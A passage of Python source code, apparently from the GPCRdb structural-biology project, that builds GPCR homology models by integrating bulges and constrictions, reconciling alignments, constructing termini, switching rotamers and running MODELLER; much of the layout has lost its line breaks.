a.template_dict[temp_seg][parse.gn_indecer(gn,'x',+1)] not in ['-','/']): # bulge in reference if len(str(gn_num))==3: if switch_bulges==True: try: Bulge = Bulges(gn) bulge_template = Bulge.find_bulge_template(self.similarity_table_all, bulge_in_reference=True) bulge_site = OrderedDict([ (parse.gn_indecer(gn,'x',-2).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-2).replace('x','.')]), (parse.gn_indecer(gn,'x',-1).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-1).replace('x','.')]), (parse.gn_indecer(gn,'x',+1).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+1).replace('x','.')]), (parse.gn_indecer(gn,'x',+2).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+2).replace('x','.')])]) superpose = sp.BulgeConstrictionSuperpose(bulge_site, bulge_template) new_residues = superpose.run() switch_res = 0 for gen_num, atoms in bulge_template.items(): if switch_res!=0 and switch_res!=4: gn__ = gen_num.replace('.','x') self.update_template_source([gn__],Bulge.template,ref_seg) main_pdb_array[ref_seg][gen_num] = new_residues[gen_num] a.template_dict[temp_seg][gn__] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[temp_seg][gn__]==a.reference_dict[ref_seg][gn__]: a.alignment_dict[aligned_seg][gn__]=a.template_dict[temp_seg][gn__] switch_res+=1 ref_bulge_list.append({gn:Bulge.template}) if a.reference_dict[ref_seg][gn] == a.template_dict[temp_seg][gn]: a.alignment_dict[ref_seg][gn] = a.reference_dict[ref_seg][gn] else: a.alignment_dict[ref_seg][gn] 
= '.'
                                except:
                                    ref_bulge_list.append({gn:None})
                        # constriction in template
                        else:
                            if switch_constrictions==True:
                                try:
                                    Const = Constrictions(gn)
                                    constriction_template = Const.find_constriction_template(
                                        self.similarity_table_all, constriction_in_reference=False)
                                    constriction_site = OrderedDict([
                                        (parse.gn_indecer(gn,'x',-2).replace('x','.'),
                                         main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-2).replace('x','.')]),
                                        (parse.gn_indecer(gn,'x',-1).replace('x','.'),
                                         main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-1).replace('x','.')]),
                                        (parse.gn_indecer(gn,'x',+1).replace('x','.'),
                                         main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+1).replace('x','.')]),
                                        (parse.gn_indecer(gn,'x',+2).replace('x','.'),
                                         main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+2).replace('x','.')])])
                                    superpose = sp.BulgeConstrictionSuperpose(constriction_site, constriction_template)
                                    new_residues = superpose.run()
                                    switch_res = 0
                                    for gen_num, atoms in constriction_template.items():
                                        if switch_res!=0 and switch_res!=4:
                                            gn__ = gen_num.replace('.','x')
                                            self.update_template_source([gn__],Const.template,ref_seg)
                                            main_pdb_array[ref_seg][gen_num] = new_residues[gen_num]
                                            a.template_dict[temp_seg][gn__] = PDB.Polypeptide.three_to_one(
                                                atoms[0].get_parent().get_resname())
                                            if a.template_dict[temp_seg][gn__]==a.reference_dict[ref_seg][gn__]:
                                                a.alignment_dict[aligned_seg][gn__]=a.template_dict[temp_seg][gn__]
                                        switch_res+=1
                                    temp_const_list.append({gn:Const.template})
                                    if a.reference_dict[ref_seg][gn] == a.template_dict[temp_seg][gn]:
                                        a.alignment_dict[ref_seg][gn] = a.reference_dict[ref_seg][gn]
                                    else:
                                        a.alignment_dict[ref_seg][gn] = '.'
                                except:
                                    temp_const_list.append({gn:None})
            for i,ii in delete_r:
                del a.reference_dict[i][ii]
            for i,ii in delete_t:
                del a.template_dict[i][ii]
            for i,ii in delete_a:
                del a.alignment_dict[i][ii]
            self.statistics.add_info('reference_bulges', ref_bulge_list)
            self.statistics.add_info('template_bulges', temp_bulge_list)
            self.statistics.add_info('reference_constrictions', ref_const_list)
            self.statistics.add_info('template_constrictions', temp_const_list)

            # insert bulge to array in the right place
            if ref_bulge_list!=[]:
                out_pdb_array = OrderedDict()
                bulge_gns = []
                for bulge in ref_bulge_list:
                    if list(bulge.values())[0]!=None:
                        gn = list(bulge.keys())[0].replace('x','.')
                        bulge_gns.append(gn)
                for seg_id, residues in main_pdb_array.items():
                    seg = OrderedDict()
                    for key, value in residues.items():
                        seg[key] = value
                        if str(key)+'1' in bulge_gns:
                            seg[str(key)+'1'] = main_pdb_array[seg_id][str(key)+'1']
                    out_pdb_array[seg_id] = seg
                main_pdb_array = out_pdb_array
            if temp_const_list!=[]:
                out_pdb_array = OrderedDict()
                const_gns = []
                for const in temp_const_list:
                    gn_ = list(const.keys())[0].replace('x','.')
                    const_gns.append(gn_)
                for seg_id, residues in main_pdb_array.items():
                    seg = OrderedDict()
                    for key, value in residues.items():
                        seg[key] = value
                        if parse.gn_indecer(key, '.', +1) in const_gns:
                            gn = parse.gn_indecer(key, '.', +1)
                            try:
                                seg[gn] = main_pdb_array[seg_id][gn]
                            except:
                                seg[gn.replace('.','?')] = '-'
                                a.alignment_dict[seg_id][gn.replace('.','?')] = '-'
                                a.reference_dict[seg_id] = OrderedDict([(g.replace('x','?'), v) if g==gn.replace('.','x')
                                                                        else (g, v) for g, v in a.reference_dict[seg_id].items()])
                                a.template_dict[seg_id] = OrderedDict([(g.replace('x','?'), v) if g==gn.replace('.','x')
                                                                       else (g, v) for g, v in a.template_dict[seg_id].items()])
                    out_pdb_array[seg_id] = seg
                main_pdb_array = out_pdb_array
        if self.debug:
            print('Integrate bulges/constrictions: ',datetime.now() - startTime)

        # check for inconsistencies with db
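        # Descriptive comment (added): each inconsistency is collected as a one-entry
        # dict mapping the generic number to the amino acid recorded in the database,
        # e.g. {'2x50': 'D'} (illustrative values only). These entries later drive the
        # renumbering/relabeling of main_pdb_array and the alignment dicts.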
pdb_db_inconsistencies = [] for seg_label, segment in a.template_dict.items(): try: for gn, res in segment.items(): try: if (res==PDB.Polypeptide.three_to_one( main_pdb_array[seg_label][gn.replace('x','.')][0].get_parent().get_resname()) and main_pdb_array[seg_label][gn.replace('x','.')][0].get_parent().get_resname()!='YCM'): pass elif 'x' in gn: try: Residue.objects.get( protein_conformation__protein=self.main_structure.protein_conformation.protein, display_generic_number__label=dgn(gn,self.main_structure.protein_conformation)) pdb_db_inconsistencies.append({gn:a.template_dict[seg_label][gn]}) except: pass else: pass except: pass except: pass if pdb_db_inconsistencies!=[]: for incons in pdb_db_inconsistencies: seg = self.segment_coding[int(list(incons.keys())[0][0])] seq_num = Residue.objects.get( protein_conformation__protein=self.main_structure.protein_conformation.protein, display_generic_number__label=dgn(list(incons.keys())[0],self.main_structure.protein_conformation)) temp_segment, temp_array = OrderedDict(), OrderedDict() for key, value in main_pdb_array[seg].items(): if key==str(seq_num.sequence_number): temp_segment[list(incons.keys())[0].replace('x','.')] = value else: temp_segment[key] = value for seg_id, segment in main_pdb_array.items(): if seg_id==seg: temp_array[seg_id] = temp_segment else: temp_array[seg_id] = segment main_pdb_array = temp_array a.template_dict[seg][list(incons.keys())[0]] = PDB.Polypeptide.three_to_one( main_pdb_array[seg][list(incons.keys())[0].replace('x','.')][0].get_parent().get_resname()) if a.reference_dict[seg][list(incons.keys())[0]]==a.template_dict[seg][list(incons.keys())[0]]: a.alignment_dict[seg][list(incons.keys())[0]] = a.reference_dict[seg][list(incons.keys())[0]] else: a.alignment_dict[seg][list(incons.keys())[0]] = '.' for seg in main_pdb_array: for gn, atoms in main_pdb_array[seg].items(): try: if atoms[0].get_parent().get_resname() in ['YCM','CSD']: if self.debug: print(gn, atoms[0].get_parent().get_resname(), atoms[0].get_parent().get_id()) a.alignment_dict[seg][gn.replace('.','x')] = '.' 
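                    # Descriptive comment (added): YCM and CSD are chemically modified
                    # cysteine residues in the template structure; flagging the position
                    # with '.' in alignment_dict treats it as non-conserved so the rotamer
                    # is rebuilt later instead of being copied from the template.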
except: pass self.statistics.add_info('pdb_db_inconsistencies', pdb_db_inconsistencies) path = "./structure/homology_models/" if not os.path.exists(path): os.mkdir(path) if self.debug: print('Check inconsistencies: {}'.format(pdb_db_inconsistencies),datetime.now() - startTime) # inserting loops for free modeling for label, template in loop_stat.items(): if template==None: modeling_loops = Loops(self.reference_protein, label, self.similarity_table_all, self.main_structure, self.helix_end_mods, list(self.template_source), self.revise_xtal) modeling_loops.insert_gaps_for_loops_to_arrays(main_pdb_array, a.reference_dict, a.template_dict, a.alignment_dict) main_pdb_array = modeling_loops.main_pdb_array a.reference_dict = modeling_loops.reference_dict a.template_dict = modeling_loops.template_dict a.alignment_dict = modeling_loops.alignment_dict if self.debug: print('Free loops: ',datetime.now() - startTime) # Adjust H8 if needed if 'H8' in main_pdb_array and 'ICL4' not in main_pdb_array and len(self.helix_end_mods['removed']['TM7'][1])>0: unwind_num = math.ceil(len(self.helix_end_mods['removed']['TM7'][1])/2) trimmed_residues+=list(main_pdb_array['TM7'].keys())[(unwind_num*-1):]+list(main_pdb_array['H8'].keys())[:unwind_num] # N- and C-termini if N_and_C_termini==True: #and self.prot_conf.protein==self.main_structure.protein_conformation.protein.parent: N_struct = self.template_source['TM1'][list(self.template_source['TM1'])[0]][0] N_term = Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='N-term') if N_struct!=None: N_term_temp = Residue.objects.filter(protein_conformation=N_struct.protein_conformation, protein_segment__slug='N-term') last_five = [i.sequence_number for i in list(N_term_temp) if i.sequence_number<1000] if self.prot_conf.protein!=self.main_structure.protein_conformation.protein.parent: last_five = last_five[-5:] else: last_five = [] if self.main_structure==N_struct: try: temp_coo = list(parse.fetch_residues_from_pdb(N_struct,last_five).values()) except: temp_coo = None elif len(last_five)==5: try: temp_nums = last_five + [i for i in range(last_five[-1]+1,last_five[-1]+5)] template = parse.fetch_residues_from_pdb(N_struct,temp_nums) ref_nums = list(main_pdb_array['TM1'])[:4] reference = OrderedDict() for i in ref_nums: reference[i] = main_pdb_array['TM1'][i] superpose = sp.OneSidedSuperpose(reference,template,4,0) sup_residues = superpose.run() n_count2 = 0 temp_coo = [] for num, atoms in sup_residues.items(): if n_count2<5: temp_coo.append(atoms) n_count2+=1 except: temp_coo = None else: temp_coo = None r_i, t_i, a_i, arr_i = OrderedDict(),OrderedDict(),OrderedDict(),OrderedDict() N_r, N_t, N_a, N_arr = OrderedDict(),OrderedDict(),OrderedDict(),OrderedDict() n_count = 0 for n in N_term: n_count+=1 N_r[str(n.sequence_number)] = n.amino_acid N_a[str(n.sequence_number)] = '-' try: N_arr[str(n.sequence_number)] = temp_coo[-1*(len(N_term)-n_count+1)] N_t[str(n.sequence_number)] = list(N_term_temp)[-1*(len(N_term)-n_count+1)].amino_acid self.template_source['N-term'][str(n.sequence_number)][0] = N_struct self.template_source['N-term'][str(n.sequence_number)][1] = N_struct except: N_t[str(n.sequence_number)] = '-' N_arr[str(n.sequence_number)] = '-' r_i['N-term'] = N_r t_i['N-term'] = N_t a_i['N-term'] = N_a arr_i['N-term'] = N_arr for r,t,al,arr in zip(a.reference_dict,a.template_dict,a.alignment_dict,main_pdb_array): r_i[r]=a.reference_dict[r] t_i[t]=a.template_dict[t] a_i[al]=a.alignment_dict[al] arr_i[arr]=main_pdb_array[arr] a.reference_dict = r_i 
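        # Descriptive comment (added): the assignments around this point swap in the
        # re-ordered dicts built above, so that the newly constructed N-term segment
        # precedes TM1 in the reference/template/alignment dicts and in main_pdb_array.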
a.template_dict = t_i a.alignment_dict = a_i main_pdb_array = arr_i try: index = -1 while self.template_source['H8'][list(self.template_source['H8'])[index]][0]==None: index-=1 C_struct = self.template_source['H8'][list(self.template_source['H8'])[index]][0] last_seg = 'H8' except: C_struct = self.template_source['TM7'][list(self.template_source['TM7'])[-1]][0] last_seg = 'TM7' C_term = Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='C-term') C_term_temp = Residue.objects.filter(protein_conformation=C_struct.protein_conformation, protein_segment__slug='C-term') first_five = [i.sequence_number for i in list(C_term_temp) if i.sequence_number<1000] if self.main_structure==C_struct: try: temp_coo2 = list(parse.fetch_residues_from_pdb(C_struct,first_five).values()) except: temp_coo2 = None elif len(first_five)==5: try: temp_nums2 = [i for i in range(first_five[0]-4,first_five[0])] + first_five template2 = parse.fetch_residues_from_array(C_struct,temp_nums2) ref_nums2 = list(main_pdb_array[last_seg])[-4:] reference2 = OrderedDict() for i in ref_nums2: reference2[i] = main_pdb_array[last_seg][i] superpose2 = sp.OneSidedSuperpose(reference2,template2,4,1) sup_residues2 = superpose2.run() c_count2 = 0 temp_coo2 = [] for num, atoms in sup_residues2.items(): if c_count2<5: temp_coo2.append(atoms) c_count2+=1 except: temp_coo2 = None else: temp_coo2 = None a.reference_dict['C-term'],a.template_dict['C-term'] = OrderedDict(),OrderedDict() a.alignment_dict['C-term'],main_pdb_array['C-term'] = OrderedDict(),OrderedDict() c_count = -1 for c in C_term: c_count+=1 if self.revise_xtal==True and self.main_structure.pdb_code.index=='1GZM': if c.sequence_number in [327,328,329]: continue a.reference_dict['C-term'][str(c.sequence_number)] = c.amino_acid a.alignment_dict['C-term'][str(c.sequence_number)] = '-' try: main_pdb_array['C-term'][str(c.sequence_number)] = temp_coo2[c_count] a.template_dict['C-term'][str(c.sequence_number)] = list(C_term_temp)[c_count].amino_acid self.template_source['C-term'][str(c.sequence_number)][0] = C_struct self.template_source['C-term'][str(c.sequence_number)][1] = C_struct except: a.template_dict['C-term'][str(c.sequence_number)] = '-' main_pdb_array['C-term'][str(c.sequence_number)] = '-' # Shorten N- and C-termini n_count=1 delete_termini = set() for num in list(a.template_dict['N-term'])[:-5]: if a.template_dict['N-term'][num]=='-': delete_termini.add(('N-term', num)) n_count+=1 c_count=1 for num in list(a.template_dict['C-term'])[5:]: if a.template_dict['C-term'][num]=='-': delete_termini.add(('C-term', num)) c_count+=1 for i, ii in delete_termini: del a.reference_dict[i][ii] del a.template_dict[i][ii] del a.alignment_dict[i][ii] del main_pdb_array[i][ii] del self.template_source[i][ii] if len(a.reference_dict['N-term'])==0: del a.reference_dict['N-term'] del a.template_dict['N-term'] del a.alignment_dict['N-term'] del main_pdb_array['N-term'] # Shorten ICL3 for i in a.reference_dict: if i.startswith('ICL3'): label = i break try: if len(a.reference_dict[label])>10: delete_ts, delete_r, delete_t, delete_a, delete_m = set(),set(),set(),set(),set() chain_break = False icl3_c = 0 keys = list(self.template_source['ICL3'].keys()) length = len(a.template_dict[label]) if self.revise_xtal==True: ref_prot = self.reference_protein.parent else: ref_prot = self.reference_protein for r_s,t_s,a_s,ar_s in zip(a.reference_dict[label],a.template_dict[label], a.alignment_dict[label],main_pdb_array[label]): icl3_c+=1 if 5<icl3_c<length-4: if 
self.main_structure.protein_conformation.protein.parent==ref_prot and chain_break==False: a.reference_dict[label][r_s] = '/' a.template_dict[label][t_s] = '/' a.alignment_dict[label][a_s] = '/' main_pdb_array[label][ar_s] = '/' delete_ts.add(('ICL3',keys[icl3_c-1])) chain_break = True else: delete_r.add((label,r_s)) delete_t.add((label,t_s)) delete_a.add((label,a_s)) delete_m.add((label,ar_s)) delete_ts.add(('ICL3',keys[icl3_c-1])) for i,ii in delete_ts: del self.template_source[i][ii] for i,ii in delete_r: del a.reference_dict[i][ii] for i,ii in delete_t: del a.template_dict[i][ii] for i,ii in delete_a: del a.alignment_dict[i][ii] for i,ii in delete_m: del main_pdb_array[i][ii] except: pass # non-conserved residue switching if switch_rotamers==True: non_cons_switch = self.run_non_conserved_switcher(main_pdb_array,a.reference_dict,a.template_dict, a.alignment_dict) main_pdb_array = non_cons_switch[0] a.reference_dict = non_cons_switch[1] a.template_dict = non_cons_switch[2] a.alignment_dict = non_cons_switch[3] trimmed_residues+=non_cons_switch[4] else: for seg_id, seg in main_pdb_array.items(): for key in seg: if a.reference_dict[seg_id][str(key).replace('.','x')]!='-': trimmed_residues.append(key) if 'ICL4_free' in main_pdb_array: freeICL4=True else: freeICL4=False if freeICL4==True: for i in list(main_pdb_array['H8']): if i not in trimmed_residues: trimmed_residues.append(i) array_keys = list(main_pdb_array.keys()) for i,j in self.helix_end_mods['added'].items(): try: if j[0][-1].replace('x','.') not in trimmed_residues: trimmed_residues.append(j[0][-1].replace('x','.')) except: pass try: if j[1][0].replace('x','.') not in trimmed_residues: trimmed_residues.append(j[1][0].replace('x','.')) except: pass try: if j[0][0].replace('x','.') not in trimmed_residues and '_cont' in array_keys[array_keys.index(i)-1]: trimmed_residues.append(j[0][0].replace('x','.')) except: pass try: if j[1][-1].replace('x','.') not in trimmed_residues and array_keys[array_keys.index(i)+1]+'_cont' in array_keys: trimmed_residues.append(j[1][-1].replace('x','.')) except: pass try: trimmed_residues.append(parse.gn_indecer(j[0][-1],'x',1).replace('x','.')) except: pass try: trimmed_residues.append(parse.gn_indecer(j[1][0],'x',-1).replace('x','.')) except: pass for i in ref_bulge_list+temp_bulge_list+ref_const_list+temp_const_list: i = list(i.keys())[0].replace('x','.') if parse.gn_indecer(i,'.',-2) not in trimmed_residues: trimmed_residues.append(parse.gn_indecer(i,'.',-2)) if parse.gn_indecer(i,'.',-1) not in trimmed_residues: trimmed_residues.append(parse.gn_indecer(i,'.',-1)) if parse.gn_indecer(i,'.',1) not in trimmed_residues: trimmed_residues.append(parse.gn_indecer(i,'.',1)) if parse.gn_indecer(i,'.',2) not in trimmed_residues: trimmed_residues.append(parse.gn_indecer(i,'.',2)) for s in a.reference_dict: if 'dis' in s: key_list=list(a.reference_dict[s].keys()) i, j = 0, -1 found_first, found_second = False, False while found_first==False: if a.reference_dict[s][key_list[i]]!='x': found_first=True i+=1 while found_second==False: if a.reference_dict[s][key_list[j]]!='x': trimmed_residues.append(key_list[j].replace('x','.')) found_second=True j-=1 segs = list(a.reference_dict.keys()) if i>0: trimmed_residues.append(list(a.reference_dict[segs[segs.index(s)-1]].keys())[-1].replace('x','.')) if j<-1: trimmed_residues.append(list(a.reference_dict[segs[segs.index(s)+1]].keys())[0].replace('x','.')) if self.reference_entry_name.startswith('taar') and str(self.main_structure)=='4IAR': trimmed_residues.append('5.36') if 
self.debug: print('Rotamer switching: ',datetime.now() - startTime) for i in model_loops: for j in a.reference_dict[i]: trimmed_residues.append(j.replace('x','.')) if self.reference_protein.family.slug.startswith('004'): for i in a.template_dict['H8']: trimmed_residues.append(i.replace('x','.')) self.statistics.add_info('trimmed_residues', trimmed_residues) # check if ECL3 might have a disulfide bridge self.disulfide_pairs.append(self.ECL3_disulfide(a.reference_dict)) self.statistics.add_info('disulfide_pairs', self.disulfide_pairs) # if complex if self.complex: self.signprot_complex = SignprotComplex.objects.get(structure=self.main_structure) structure_signprot= self.signprot_complex.protein if self.signprot!=False: target_signprot = Protein.objects.get(entry_name=self.signprot) else: target_signprot = self.signprot_complex.protein self.signprot_protconf = ProteinConformation.objects.get(protein=target_signprot) sign_a = GProteinAlignment() sign_a.run_alignment(target_signprot) io = StringIO(self.main_structure.pdb_data.pdb) assign_cgn = as_gn.GenericNumbering(pdb_file=io, pdb_code=self.main_structure.pdb_code.index, sequence_parser=True, signprot=structure_signprot) signprot_pdb_array = assign_cgn.assign_cgn_with_sequence_parser(self.signprot_complex.chain) new_array = OrderedDict() # for seg, values in signprot_pdb_array.items(): # # main_pdb_array[seg] = values # self.template_source[seg] = OrderedDict() # for key in values: # self.template_source[seg][key] = [self.main_structure, self.main_structure] for seg, values in sign_a.reference_dict.items(): new_array[seg] = OrderedDict() self.template_source[seg] = OrderedDict() for key, res in values.items(): try: if signprot_pdb_array[seg][key] == 'x': values[key] = 'x' new_array[seg][key] = 'x' del self.template_source[seg][key] else: if res == '-': new_array[seg][key] = 'x' del self.template_source[seg][key] else: new_array[seg][key] = signprot_pdb_array[seg][key] self.template_source[seg][key] = [self.main_structure, self.main_structure] except: if res!='-': new_array[seg][key] = '-' self.template_source[seg][key] = [None, None] a.reference_dict[seg] = values for seg, values in sign_a.template_dict.items(): for key, res in values.items(): if new_array[seg][key] == 'x': values[key] = 'x' a.template_dict[seg] = values for seg, values in sign_a.alignment_dict.items(): for key, res in values.items(): if new_array[seg][key] == 'x': values[key] = 'x' a.alignment_dict[seg] = values signprot_pdb_array = new_array for seg, values in signprot_pdb_array.items(): main_pdb_array[seg] = values # write to file trimmed_res_nums, helix_restraints, icl3_mid, disulfide_nums = self.write_homology_model_pdb(path+self.reference_entry_name+'_'+self.state+"_post.pdb", main_pdb_array, a, trimmed_residues=trimmed_residues, disulfide_pairs=self.disulfide_pairs) self.statistics.add_info('template_source',self.template_source) # Adding HETATMs when revising xtal hetatm_count = 0 water_count = 0 if self.revise_xtal==True: ref_prot = self.reference_protein.parent else: ref_prot = self.reference_protein if ref_prot==self.main_structure.protein_conformation.protein.parent: pdb = PDB.PDBList() pdb.retrieve_pdb_file(str(self.main_structure), pdir='./', file_format='pdb') self.alternate_water_positions = OrderedDict() with open('./pdb{}.ent'.format(str(self.main_structure).lower()),'r') as f: lines = f.readlines() with open(path+self.reference_entry_name+'_'+self.state+"_post.pdb", 'a') as model: hetatm = 1 for line in lines: if line.startswith('HETATM'): if 'YCM' in line 
or 'CSD' in line: continue pref_chain = str(self.main_structure.preferred_chain) if len(pref_chain)>1: pref_chain = pref_chain[0] try: pdb_re = re.search('(HETATM[0-9\sA-Z{apo}]{{11}})([A-Z0-9\s]{{3}})\s({pref})([0-9\s]{{4}})'.format(apo="'",pref=pref_chain), line) if pdb_re.group(2)!='HOH': if hetatm!=pdb_re.group(4): hetatm_count+=1 hetatm = pdb_re.group(4) else: if pdb_re.group(1)[-1]==' ' or pdb_re.group(1)[-1]==pref_chain: water_count+=1 elif pdb_re.group(1)[-1] in ['B','C','D']: self.alternate_water_positions[water_count] = line if pdb_re!=None: model.write(line) except: continue model.write('END') # correcting for side chain clashes p = PDB.PDBParser() post_model = p.get_structure('post', path+self.reference_entry_name+'_'+self.state+"_post.pdb")[0] hse = HSExposureCB(post_model, radius=11) clash_pairs = hse.clash_pairs for i in clash_pairs: gn1 = str(i[0][0]).replace('.','x') if len(gn1.split('x')[1])==1: gn1 = gn1+'0' if gn1[0]=='-': gn1 = gn1[1:]+'1' gn2 = str(i[1][0]).replace('.','x') if len(gn2.split('x')[1])==1: gn2 = gn2+'0' if gn2[0]=='-': gn2 = gn2[1:]+'1' first_non_TM, second_non_TM = False, False try: try: segment1 = self.segment_coding[int(gn1.split('x')[0])] for s in a.alignment_dict: if s.startswith(segment1): segment1 = s break except: first_non_TM = True try: segment2 = self.segment_coding[int(gn2.split('x')[0])] for s in a.alignment_dict: if s.startswith(segment2): segment2 = s break except: second_non_TM = True ref_gap_counter = 0 break_loop = False try: start_dif = int(list(a.reference_dict['N-term'].keys())[0])-1 except: start_dif = None if first_non_TM==True or a.alignment_dict[segment1][gn1]=='.': for seg, resis in a.reference_dict.items(): for gn, res in resis.items(): if res=='-': ref_gap_counter+=1 if gn==gn1: trimmed_res_nums[segment1][str(i[0][0])] = i[0][1] break_loop = True break try: if i[0][1]+start_dif+ref_gap_counter==int(gn): trimmed_res_nums[seg][gn] = i[0][1] break_loop = True break except: pass if break_loop==True: break if second_non_TM==True or a.alignment_dict[segment2][gn2]=='.': for seg, resis in a.reference_dict.items(): for gn, res in resis.items(): if res=='-': ref_gap_counter+=1 if gn==gn2: trimmed_res_nums[segment2][str(i[1][0])] = i[1][1] break_loop = True break try: if i[1][1]+start_dif+ref_gap_counter==int(gn): trimmed_res_nums[seg][gn] = i[1][1] break_loop = True break except: pass if break_loop==True: break else: for seg, resis in a.reference_dict.items(): for gn, res in resis.items(): if res=='-': ref_gap_counter+=1 if gn==gn1: trimmed_res_nums[segment1][gn1.replace('x','.')] = i[0][1] elif gn==gn2: trimmed_res_nums[segment2][gn2.replace('x','.')] = i[1][1] except Exception as msg: print("Warning: Can't fix side chain clash on {}".format(msg)) self.statistics.add_info('clashing_residues', clash_pairs) # Check improved sequence identity self.identicals = 0 counter = 0 for r_s, t_s in zip(a.reference_dict, a.template_dict): for r, t in zip(a.reference_dict[r_s], a.template_dict[t_s]): if a.reference_dict[r_s][r]==a.template_dict[t_s][t]: self.identicals+=1 counter+=1 # print(self.state, counter, self.identicals) # Model with MODELLER self.create_PIR_file(a.reference_dict, a.template_dict, path+self.reference_entry_name+'_'+self.state+"_post.pdb", hetatm_count, water_count) self.alignment = a self.main_pdb_array = main_pdb_array if self.revise_xtal==False: modelname = "{}_{}_{}_{}_GPCRdb".format(self.class_name, self.reference_entry_name,self.state,self.main_structure) else: modelname = 
"{}_{}_{}_refined_{}_GPCRdb".format(self.class_name, self.reference_protein.parent.entry_name, self.main_structure, self.main_structure.state.name) os.remove('./pdb{}.ent'.format(self.reference_entry_name)) # Ignore output from modeller! if not self.debug: _stdout = sys.stdout sys.stdout = open(os.devnull, 'w') self.run_MODELLER("./structure/PIR/"+self.uniprot_id+"_"+self.state+".pir", path+self.reference_entry_name+'_'+self.state+"_post.pdb", self.uniprot_id, self.modeller_iterations, path+modelname+'.pdb', atom_dict=trimmed_res_nums, helix_restraints=helix_restraints, icl3_mid=icl3_mid, disulfide_nums=disulfide_nums) # Resume output if not self.debug: sys.stdout.close() sys.stdout = _stdout if not self.debug: os.remove(path+self.reference_entry_name+'_'+self.state+"_post.pdb") # stat file with open(path+modelname+'.templates.csv','w') as s_file: rot_table = [] sections = [] s_file.write('Segment,Sequence_number,Generic_number,Reference_receptor,Backbone_template,Rotamer_template\n') for seg, resis in self.template_source.items(): list_keys = list(resis) if len(list_keys)==0: continue first_gn = list_keys[0] first_temp = self.template_source[seg][first_gn][0] if 'x' in first_gn: try: first_seqnum = Residue.objects.get(protein_conformation=self.prot_conf,display_generic_number__label=dgn(list_keys[0],self.prot_conf)).sequence_number except: try: first_seqnum = int(list_keys[0]) except: continue elif self.complex and first_gn!=None and len(first_gn.split('.'))==3: first_seqnum = Residue.objects.get(protein_conformation=self.signprot_protconf,display_generic_number__label=list_keys[0]).sequence_number else: first_seqnum = int(first_gn) first_gn = None for gn, res in resis.items(): key = gn if 'x' in gn: seq_num = Residue.objects.get(protein_conformation=self.prot_conf,display_generic_number__label=dgn(gn,self.prot_conf)).sequence_number curr_seqnum = seq_num elif self.complex and first_gn!=None and len(first_gn.split('.'))==3: seq_num = Residue.objects.get(protein_conformation=self.signprot_protconf,display_generic_number__label=gn).sequence_number curr_seqnum = seq_num else: seq_num = int(gn) curr_seqnum = seq_num gn = None rot_table.append([seg,seq_num,gn,ref_prot.entry_name,res[0],res[1]]) seqnum_minus = False if res[0]!=first_temp: if seq_num==first_seqnum: if gn!=None: prev_gn = gn else: prev_gn = None seq_num = int(seq_num) else: if gn!=None: prev_gn = list_keys[list_keys.index(key)-1] else: prev_gn = None seq_num = int(seq_num)-1 seqnum_minus = True sections.append([seg,first_seqnum,seq_num,first_gn,prev_gn,ref_prot.entry_name,first_temp]) if prev_gn==None: first_gn = None else: first_gn = key first_seqnum = curr_seqnum first_temp = res[0] if key==list_keys[-1]: prev_gn = gn if seqnum_minus==True: seq_num = int(seq_num)+1 else: seq_num = int(seq_num) sections.append([seg,first_seqnum,seq_num,first_gn,prev_gn,ref_prot.entry_name,first_temp]) for sec in sections: # if self.revise_xtal==False and 'term' in sec[0]: # pass # else: # pass for rot in rot_table: # if self.revise_xtal==False and 'term' in sec[0]: # pass # else: if int(sec[1])<=int(rot[1])<=int(sec[2]): try: bb = rot[4].pdb_code.index except: bb = rot[4] try: rt = rot[5].pdb_code.index except: rt = rot[5] l = "{},{},{},{},{},{}\n".format(rot[0],rot[1],rot[2],rot[3],bb,rt) s_file.write(l) self.template_stats = rot_table # template seq sim file with open(path+modelname+'.template_similarities.csv','w') as s_file: template_list, self.template_list = [], OrderedDict() for r in self.template_stats: if r[4] not in template_list and 
r[4]!=None: template_list.append(r[4]) if r[5] not in template_list and r[5]!=None: template_list.append(r[5]) s_file.write('Template,Sequence_similarity,Resolution,Representative,State\n') for temp, sim in self.similarity_table_all.items(): if temp in template_list: self.template_list[temp] = sim for t, s in self.template_list.items(): s_file.write('{},{},{},{},{}\n'.format(t.pdb_code.index, s, t.resolution, t.representative, t.state.slug)) if self.debug: print('MODELLER build: ',datetime.now() - startTime) pprint.pprint(self.statistics) print('################################') return self def run_non_conserved_switcher(self, main_pdb_array, reference_dict, template_dict, alignment_dict): ''' Switches non-conserved residues with best possible template. Returns refreshed main_pdb_array (atom coordinates), reference_dict (reference generic numbers and residue ids), template_dict (template generic numbers and residue ids) and alignment_dict (aligned reference and template dictionary). @param main_pdb_array: nested OrderedDict(), output of GPCRDBParsingPDB().pdb_array_creator() @param reference_dict: reference dictionary of AlignedReferenceTemplate. @param template_dict: template dictionary of AlignedReferenceTemplate.o2 @param alignment_dict: alignment dictionary of AlignedReferenceTemplate. ''' atom_num_dict = {'E':9, 'S':6, 'Y':12, 'G':4, 'A':5, 'V':7, 'M':8, 'L':8, 'I':8, 'T':7, 'F':11, 'H':10, 'K':9, 'D':8, 'C':6, 'R':11, 'P':7, 'Q':9, 'N':8, 'W':14, '-':0} parse = GPCRDBParsingPDB() ref_length = 0 conserved_count = 0 non_cons_count = 0 trimmed_res_num = 0 switched_count = 0 non_cons_res_templates, conserved_residues = OrderedDict(), OrderedDict() trimmed_residues = [] inconsistencies = [] if self.revise_xtal==True: ref_prot = self.reference_protein.parent else: ref_prot = self.reference_protein for incons in self.statistics.info_dict['pdb_db_inconsistencies']: inconsistencies.append(list(incons.keys())[0]) for ref_seg, temp_seg, aligned_seg in zip(reference_dict, template_dict, alignment_dict): if len(ref_seg)>4: segment = ref_seg[:4] else: segment = ref_seg for ref_res, temp_res, aligned_res in zip(reference_dict[ref_seg], template_dict[temp_seg], alignment_dict[aligned_seg]): if self.revise_xtal==True and reference_dict[ref_seg][ref_res]!=template_dict[temp_seg][temp_res]: 